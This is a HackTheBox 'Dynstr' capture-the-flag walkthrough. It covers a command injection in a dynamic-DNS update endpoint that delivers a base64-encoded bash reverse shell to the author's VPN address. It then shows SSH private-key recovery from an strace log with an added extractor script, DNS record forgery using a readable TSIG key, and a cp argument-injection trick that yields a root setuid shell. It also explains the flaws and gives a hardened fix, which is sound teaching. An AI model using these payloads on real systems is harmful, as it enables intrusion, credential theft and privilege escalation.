HackTheBox - Dynstr walkthrough
- theblackthreat
- Jun 14, 2021
- 5 min read
Updated: Jun 14, 2021

Recon
$ nmap -vvv -p 22,53,80 -A -v -oN intial.nmap 10.129.157.100
Nmap scan report for dynstr.htb (10.129.157.100)
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-06-13 04:53:51 BST for 16s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 05:7c:5e:b1:83:f9:4f:ae:2f:08:e1:33:ff:f5:83:9e (RSA)
| ssh-rsa ...
| 256 3f:73:b4:95:72:ca:5e:33:f6:8a:8f:46:cf:43:35:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFtYzp8umMbm7o9+1LUTVio/dduowE/AsA3rO52A5Q/Cuct9GY6IZEvPE+/XpEiNCPMSl991kjHT+WaAunmTbT4=
| 256 cc:0a:41:b7:a1:9a:43:da:1b:68:f5:2a:f8:2a:75:2c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOz8b9MDlSPP5QJgSHy6fpG98bdKCgvqhuu07v5NFkdx
53/tcp open domain syn-ack ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyna DNS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 13 04:54:07 2021 -- 1 IP address (1 host up) scanned in 18.86 seconds.
-------------------------------------------------------------------------------------------------------------
Enumeration:

Let's add the hostnames to /etc/hosts. Note that `sudo echo ... >> /etc/hosts` does not work, because the redirection is performed by your own (unprivileged) shell before sudo runs, so use tee instead. 10.10.10.244 is the box address used here while the scan above targeted 10.129.157.100; use whichever IP your instance has. dyna.htb is included because the next steps use it:
$ echo "10.10.10.244 dynamicdns.htb no-ip.htb dynstr.htb dyna.htb beta.dyna.htb" | sudo tee -a /etc/hosts
The site itself shows nothing useful, so let's look for directories under the /nic/ path:
$ ffuf -u http://dyna.htb/nic/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://dyna.htb/nic/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.htaccess [Status: 403, Size: 273, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 273, Words: 20, Lines: 10]
update [Status: 200, Size: 8, Words: 1, Lines: 2]
:: Progress: [20469/20469] :: Job [1/1] :: 982 req/sec :: Duration: [0:00:38] :: Errors: 3 ::
1: There is an update endpoint. Requesting it without credentials returns badauth (that is the 8-byte body in the ffuf output).
2: The front page describes the beta version of the service and lists the beta credentials:

Username: dynadns
Password: sndanyd
Now request dynstr.htb/nic/update with those credentials. Either intercept the request in Burp and add the Authorization header, or use this short script, which sends the same request with HTTP basic auth (it does not need the saved Burp request):
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#!/usr/bin/python3
import requests
from requests.auth import HTTPBasicAuth

# Replay the /nic/update request with the beta credentials from the front page.
url = 'http://dyna.htb/nic/update'
res = requests.get(url, auth=HTTPBasicAuth('dynadns', 'sndanyd'))
print(res.text)  # with no parameters the API just reports our own source IP
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
$ chmod +x script.py
$ ./script.py
nochg 10.10.16.104
The API uses the dyn.com return codes: nochg means the address is already current (here our own VPN IP, because we sent no parameters).
help : https://help.dyn.com/remote-access-api/return-codes/
$ curl "http://beta.dyna.htb/nic/update?myip=10.129.157.100&hostname=beta.dynamicdns.htb&systsm=id" -H "Authorization: Basic ZHluYWRuczpzbmRhbnlk"
output : good 10.129.157.100
good means the update was accepted. The hostname value is what the server feeds into its DNS update, so that is where we inject. Encode a reverse shell in base64 so the command itself carries no characters that could break the shell quoting; the injected wrapper decodes and runs it:
$ echo "bash -i &>/dev/tcp/10.10.16.104/8443 <&1" | base64
YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE2LjEwNC84NDQzIDwmMQo=
Now intercept the request again, send it to Repeater and put the payload into the hostname parameter. The backtick command substitution runs when the server builds its nsupdate input, and the value still ends in one of the accepted dynamic-DNS domains (dynadns.no-ip.htb), so the server still derives a valid zone from it, as the response below shows:
GET /nic/update?hostname=`echo+"YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE2LjEwNC84NDQzIDwmMQo="+|+base64+-d|+bash`"dynadns.no-ip.htb&myip=10.10.16.104&offline=YES HTTP/1.1
Host: dynstr.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Authorization: Basic ZHluYWRuczpzbmRhbnlk
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Meanwhile, start a netcat listener on the port from the payload:
$ nc -lvnp 8443
When the response comes back like this:
HTTP/1.1 200 OK
Date: Sun, 13 Jun 2021 15:17:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8
server 127.0.0.1
zone no-ip.htb
update delete dynadns.no-ip.htb
good 10.10.16.104
the netcat listener has a shell as www-data. The user flag lives in bindmgr's home and www-data cannot read it, so we need another way to that user:
www-data@dynstr:/var/www/html/nic$ cat /home/bindmgr/user.txt
www-data@dynstr:/var/www/html/nic$ cd /home/bindmgr
Inside is a support-case directory (the C62796521 in the file names) holding debugging captures:
$ ls -al
total 436
drwxr-xr-x 2 bindmgr bindmgr 4096 Mar 13 14:53 .
drwxr-xr-x 5 bindmgr bindmgr 4096 Mar 15 20:39 ..
-rw-r--r-- 1 bindmgr bindmgr 237141 Mar 13 14:53 C62796521-debugging.script
-rw-r--r-- 1 bindmgr bindmgr 29312 Mar 13 14:53 C62796521-debugging.timing
-rw-r--r-- 1 bindmgr bindmgr 1175 Mar 13 14:53 command-output-C62796521.txt
-rw-r--r-- 1 bindmgr bindmgr 163048 Mar 13 14:52 strace-C62796521.txt
Look through these files: the strace capture (strace-C62796521.txt) contains an OpenSSH private key that was read during the traced session, so grep it for "PRIVATE KEY". strace prints the data as an escaped C string (literal \n between the key lines), so unescape it when you copy it out.
help: https://kb.iu.edu/d/aews
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
Save it as id_rsa in ~/.ssh on your own machine (with an editor, keeping the line breaks) and make it readable only by you; ssh refuses private keys other users can read:
.ssh$ echo "paste the above key" > id_rsa
.ssh$ chmod 600 id_rsa
The key alone is not enough, though: the login only works once the DNS condition attached to the key is satisfied, which is the next part.
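A small extractor for the key, added here and not part of the post: it reads an strace capture, unescapes the C-style string literals strace prints, and pulls out any PEM private-key block, even when the key spans several read()/write() calls. The strace lines in SAMPLE_STRACE are constructed for the demo and the key body in them is dummy data, not the box's key. One caveat: strace truncates strings at 32 bytes unless it was run with a larger -s, and a truncated capture cannot be recovered this way.

```python
#!/usr/bin/env python3
"""Recover a PEM private key from an strace capture. Added example, not from the post."""
import os
import re

# Constructed strace lines for the demo: the key body is dummy base64, NOT the box's key,
# and the byte counts are illustrative.
SAMPLE_STRACE = r'''openat(AT_FDCWD, "/home/bindmgr/.ssh/id_rsa", O_RDONLY) = 5
fstat(5, {st_mode=S_IFREG|0600, st_size=155, ...}) = 0
read(5, "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB\n", 4096) = 92
read(5, "AAAAMwAAAAtzc2gtZWQyNTUxOQ==\n-----END OPENSSH PRIVATE KEY-----\n", 4096) = 63
read(5, "", 4096) = 0
write(2, "debug1: identity file \"/home/bindmgr/.ssh/id_rsa\" type 3\n", 57) = 57
'''

# strace prints C-style string literals; this matches one, including escaped quotes.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b",
                  "f": "\f", "v": "\v", '"': '"', "\\": "\\"}
PEM_BLOCK = re.compile(
    r"-----BEGIN ([A-Z ]+) PRIVATE KEY-----\n.*?-----END \1 PRIVATE KEY-----\n", re.S)


def unescape(literal: str) -> str:
    r"""Undo strace's escaping: \n, \t, \", \\, octal \NNN and hex \xHH."""
    out = []
    i = 0
    while i < len(literal):
        ch = literal[i]
        if ch != "\\":
            out.append(ch)
            i += 1
            continue
        nxt = literal[i + 1]
        if nxt in "01234567":                     # octal escape, up to three digits
            j = i + 1
            while j < len(literal) and j < i + 4 and literal[j] in "01234567":
                j += 1
            out.append(chr(int(literal[i + 1:j], 8)))
            i = j
        elif nxt == "x":                          # hex escape (strace -x)
            out.append(chr(int(literal[i + 2:i + 4], 16)))
            i += 4
        else:
            out.append(SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
    return "".join(out)


def extract_private_keys(strace_text: str) -> list:
    """Concatenate every string literal in file order, then pull out PEM blocks.
    Joining first is what reassembles a key split across several read()/write() calls."""
    stream = "".join(unescape(m.group(1)) for m in STRING_LITERAL.finditer(strace_text))
    return [m.group(0) for m in PEM_BLOCK.finditer(stream)]


def save_key(pem: str, path: str) -> None:
    """Create the key file with mode 0600 from the start, which is what ssh requires."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(pem)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_STRACE
    for key in extract_private_keys(text):
        print(key, end="")
```

Usage: `./strace_key.py strace-C62796521.txt > id_rsa` (or call save_key() to get the 0600 file directly).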
Exploitation:
The condition is on the client's reverse DNS. A PTR record gives the name associated with an IP, and the key is only accepted when the name our IP resolves to matches the pattern the key is restricted to, a host under infra.dyna.htb (the post does not show the pattern itself; the record added below is what satisfied it). sshd also resolves that name forward again and falls back to the bare IP if it does not map back, so we need both a PTR record for our address and a matching A record.
To add records to the infra zone we need the TSIG key the server accepts dynamic updates with. It is readable at /etc/bind/infra.key (anyone who can read this file can rewrite the zone):
```bash
cat /etc/bind/infra.key
key "infra-key" {
algorithm hmac-sha256;
secret "7qHH/eYXorN2ZNUM1dpLie5BmVstOw55LgEeacJZsao=";
};
```
With the key, nsupdate (-k reads the TSIG key file) can push our records. The A record belongs to the infra.dyna.htb zone and the PTR to a reverse in-addr.arpa zone; a single UPDATE message can only target one zone, so send the two records as separate updates (show prints the pending message before it goes out):
www-data@dynstr:~$ nsupdate -k /etc/bind/infra.key
> update add api.infra.dyna.htb 86400 A 10.10.16.104
> send
> update add 104.16.10.10.in-addr.arpa 86400 PTR api.infra.dyna.htb
> show
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id: 0
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; UPDATE SECTION:
104.16.10.10.in-addr.arpa. 86400 IN PTR api.infra.dyna.htb.
> send
> quit
Replace 10.10.16.104 with your own VPN address, and reverse the octets for the PTR owner name accordingly.
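To see why both records are needed, here is a model of the check, added here and not part of the post. It assumes the key is restricted with an authorized_keys from= pattern such as *.infra.dyna.htb (the post does not show the actual restriction; the name is taken from the record the author adds) and that sshd runs with UseDNS enabled. FakeDNS stands in for the box's resolver with constructed data, and nsupdate_script() generates the two-transaction input used above for any address.

```python
#!/usr/bin/env python3
"""Model of the reverse-DNS condition on the bindmgr key. Added example, not from the post.
Assumptions: an authorized_keys from= pattern like "*.infra.dyna.htb" (not shown in the
post) and sshd with UseDNS on."""
import fnmatch
import ipaddress


def reverse_name(ip: str) -> str:
    """Owner name of the PTR record for ip (in-addr.arpa for v4, ip6.arpa for v6)."""
    return ipaddress.ip_address(ip).reverse_pointer


def nsupdate_script(name: str, ip: str, ttl: int = 86400) -> str:
    """nsupdate input adding the A and PTR records as two transactions: a DNS UPDATE
    message is scoped to one zone, and the forward and reverse names live in different zones."""
    return "\n".join([
        f"update add {name}. {ttl} A {ip}",
        "send",
        f"update add {reverse_name(ip)}. {ttl} PTR {name}.",
        "send",
        "quit",
        "",
    ])


def canonical_hostname(ip: str, reverse_lookup, forward_lookup) -> str:
    """What sshd uses as the client's name with UseDNS: the PTR name, but only if that
    name resolves forward to the same address; otherwise the bare IP, which hostname
    patterns never match."""
    try:
        name = reverse_lookup(ip).rstrip(".").lower()
    except LookupError:
        return ip
    if ip not in forward_lookup(name):
        return ip
    return name


def from_option_allows(patterns: str, ip: str, reverse_lookup, forward_lookup) -> bool:
    """Simplified from="p1,p2,!p3" evaluation: a negated match denies, any other match
    allows, and each pattern is tried against both the canonical name and the IP."""
    host = canonical_hostname(ip, reverse_lookup, forward_lookup)
    allowed = False
    for pat in patterns.lower().split(","):
        negated = pat.startswith("!")
        pat = pat.lstrip("!")
        if fnmatch.fnmatchcase(host, pat) or fnmatch.fnmatchcase(ip, pat):
            if negated:
                return False
            allowed = True
    return allowed


class FakeDNS:
    """Stand-in for the box's resolver, populated with constructed records."""

    def __init__(self):
        self.a, self.ptr = {}, {}

    def add_a(self, name, ip):
        self.a.setdefault(name.rstrip(".").lower(), []).append(ip)

    def add_ptr(self, ip, name):
        self.ptr[ip] = name

    def reverse(self, ip):
        if ip not in self.ptr:
            raise LookupError(ip)
        return self.ptr[ip]

    def forward(self, name):
        return self.a.get(name, [])


def demo(ip="10.10.16.104", name="api.infra.dyna.htb", pattern="*.infra.dyna.htb"):
    """Returns (allowed with the PTR only, allowed with PTR and A)."""
    dns = FakeDNS()
    dns.add_ptr(ip, name)
    ptr_only = from_option_allows(pattern, ip, dns.reverse, dns.forward)
    dns.add_a(name, ip)
    both = from_option_allows(pattern, ip, dns.reverse, dns.forward)
    return ptr_only, both


if __name__ == "__main__":
    print(nsupdate_script("api.infra.dyna.htb", "10.10.16.104"))
    print("PTR only / PTR+A:", demo())
```

The PTR-only case is the one that bites in practice: sshd logs "Address ... maps to ..., but this does not map back to the address" and keeps treating you as a bare IP.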
Back on your own machine, connect with the key (the login succeeds now because our IP reverse-resolves to an infra.dyna.htb name):
$ssh -i id_rsa bindmgr@dyna.htb
bindmgr@dynstr:~$
We are bindmgr; now for root.
bindmgr@dynstr:~$sudo -l
sudo: unable to resolve host dynstr.dyna.htb: Name or service not known
Matching Defaults entries for bindmgr on dynstr:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bindmgr may run the following commands on dynstr:
(ALL) NOPASSWD: /usr/local/bin/bindmgr.sh
The "unable to resolve host" warning from sudo is harmless. The script:
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#!/usr/bin/bash

# This script generates named.conf.bindmgr to workaround the problem
# that bind/named can only include single files but no directories.
#
# It creates a named.conf.bindmgr file in /etc/bind that can be included
# from named.conf.local (or others) and will include all files from the
# directory /etc/bin/named.bindmgr.
#
# NOTE: The script is work in progress. For now bind is not including
#       named.conf.bindmgr.
#
# TODO: Currently the script is only adding files to the directory but
#       not deleting them. As we generate the list of files to be included
#       from the source directory they won't be included anyway.

BINDMGR_CONF=/etc/bind/named.conf.bindmgr
BINDMGR_DIR=/etc/bind/named.bindmgr

indent() { sed 's/^/ /'; }

# Check versioning (.version)
echo "[+] Running $0 to stage new configuration from $PWD."
if [[ ! -f .version ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 42
fi
if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 43
fi

# Create config file that includes all files from named.bindmgr.
echo "[+] Creating $BINDMGR_CONF file."
printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF
for file in * ; do
    printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF
done

# Stage new version of configuration files.
echo "[+] Staging files to $BINDMGR_DIR."
cp .version * /etc/bind/named.bindmgr/

# Check generated configuration with named-checkconf.
echo "[+] Checking staged configuration."
named-checkconf $BINDMGR_CONF >/dev/null
if [[ $? -ne 0 ]] ; then
    echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "
    named-checkconf $BINDMGR_CONF 2>&1 | indent
    exit 44
else
    echo "[+] Configuration successfully staged."
    # *** TODO *** Uncomment restart once we are live.
    # systemctl restart bind9
    if [[ $? -ne 0 ]] ; then
        echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "
        systemctl status bind9
    else
        echo "[+] Restart of bind9 via systemctl succeeded."
    fi
fi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
The dangerous line is `cp .version * /etc/bind/named.bindmgr/`. The script runs as root from whatever directory we start it in ($PWD), and the unquoted `*` is expanded by the shell before cp sees it, so every file name in that directory becomes a cp argument. A file literally named `--preserve=mode` is therefore parsed by cp as the option --preserve=mode. Normally cp drops the setuid/setgid bits on a fresh copy; with that option it keeps them, and because root performs the copy the result in /etc/bind/named.bindmgr/ is owned by root: a root-owned setuid bash. The named-checkconf error afterwards does not matter, the copy has already happened. The only gate is the .version check, so our .version must be greater than the one already staged.
bindmgr@dynstr:~$ cd /dev/shm
bindmgr@dynstr:/dev/shm$echo "2" > .version
bindmgr@dynstr:/dev/shm$cp /bin/bash .
bindmgr@dynstr:/dev/shm$chmod +s bash
bindmgr@dynstr:/dev/shm$echo > --preserve=mode
bindmgr@dynstr:/dev/shm$ls -al
total 1164
drwxrwxrwt 2 root root 100 Jun 13 19:22 .
drwxr-xr-x 17 root root 3960 Jun 13 15:38 ..
-rwsr-sr-x 1 bindmgr bindmgr 1183448 Jun 13 19:20 bash
-rw-rw-r-- 1 bindmgr bindmgr 1 Jun 13 19:22 '--preserve=mode'
-rw-rw-r-- 1 bindmgr bindmgr 2 Jun 13 19:17 .version
bindmgr@dynstr:/dev/shm$ sudo /usr/local/bin/bindmgr.sh
sudo: unable to resolve host dynstr.dyna.htb: Name or service not known
[+] Running /usr/local/bin/bindmgr.sh to stage new configuration from /dev/shm.
[+] Creating /etc/bind/named.conf.bindmgr file.
[+] Staging files to /etc/bind/named.bindmgr.
[+] Checking staged configuration.
[-] ERROR: The generated configuration is not valid. Please fix following errors:
/etc/bind/named.bindmgr/bash:1: unknown option 'ELF...'
/etc/bind/named.bindmgr/bash:14: unknown option 'hȀE'
/etc/bind/named.bindmgr/bash:40: unknown option 'YF'
/etc/bind/named.bindmgr/bash:40: unexpected token near '}'
bindmgr@dynstr:/dev/shm$ ls
bash '--preserve=mode'
bindmgr@dynstr:/dev/shm$ ls -al
total 1164
drwxrwxrwt 2 root root 100 Jun 13 19:22 .
drwxr-xr-x 17 root root 3960 Jun 13 15:38 ..
-rwsr-sr-x 1 bindmgr bindmgr 1183448 Jun 13 19:20 bash
-rw-rw-r-- 1 bindmgr bindmgr 1 Jun 13 19:22 '--preserve=mode'
-rw-rw-r-- 1 bindmgr bindmgr 2 Jun 13 19:17 .version
The staged copy in /etc/bind/named.bindmgr/ is now root's and still setuid (check with ls -l /etc/bind/named.bindmgr/bash). Run it with -p so bash keeps the effective uid instead of dropping it:
bindmgr@dynstr:/dev/shm$ /etc/bind/named.bindmgr/bash -p
bash-5.0# id
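The cp behaviour that makes this work, reproduced in a scratch directory (added example, not from the post). It needs GNU cp; the file named bash here is a stand-in script with the setuid bit set, not a real shell, and the hardened variant shows the one-line fix a maintainer would make to bindmgr.sh: `cp -- .version ./* $BINDMGR_DIR/`, so that expanded names can never be read as options.

```python
#!/usr/bin/env python3
"""Why a file named --preserve=mode turns bindmgr.sh into a setuid-root factory.
Added example, not from the post; needs GNU cp and a writable temp directory."""
import os
import shlex
import shutil
import stat
import subprocess
import tempfile


def stage_and_copy(plant_option_file: bool, hardened: bool) -> dict:
    """Replay the script's `cp .version * $BINDMGR_DIR/` step in a scratch directory.
    'bash' here is a stand-in script with the setuid bit set, not a real shell."""
    work = tempfile.mkdtemp(prefix="bindmgr-demo-")
    try:
        src = os.path.join(work, "stage")          # plays the role of /dev/shm above
        dest = os.path.join(work, "named.bindmgr")  # plays the role of $BINDMGR_DIR
        os.mkdir(src)
        os.mkdir(dest)
        with open(os.path.join(src, ".version"), "w") as fh:
            fh.write("2\n")
        binary = os.path.join(src, "bash")
        with open(binary, "w") as fh:
            fh.write("#!/bin/sh\nid\n")
        os.chmod(binary, 0o4755)                    # same as chmod +s on the copied bash
        if plant_option_file:
            open(os.path.join(src, "--preserve=mode"), "w").close()
        if hardened:
            # '--' ends option parsing and './*' keeps expanded names from starting with '-'
            cmd = f"cp -- .version ./* {shlex.quote(dest)}/"
        else:
            cmd = f"cp .version * {shlex.quote(dest)}/"   # verbatim from bindmgr.sh
        subprocess.run(["sh", "-c", cmd], cwd=src, check=True)
        mode = os.stat(os.path.join(dest, "bash")).st_mode
        return {
            "setuid_kept": bool(mode & stat.S_ISUID),
            "option_file_copied": os.path.exists(os.path.join(dest, "--preserve=mode")),
        }
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print("plain cp, no trick:     ", stage_and_copy(False, False))
    print("plain cp, with trick:   ", stage_and_copy(True, False))
    print("hardened cp, with trick:", stage_and_copy(True, True))
```

Without the planted file the setuid bit is lost on the copy; with it, cp swallows the file name as an option and the bit survives. In the hardened form the same file is copied as an ordinary file and the bit is stripped again.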

Thanks for reading (any doubts, message me on Twitter).
Twitter: https://twitter.com/theblackthreat
Youtube: https://youtube.com/c/theblackthreat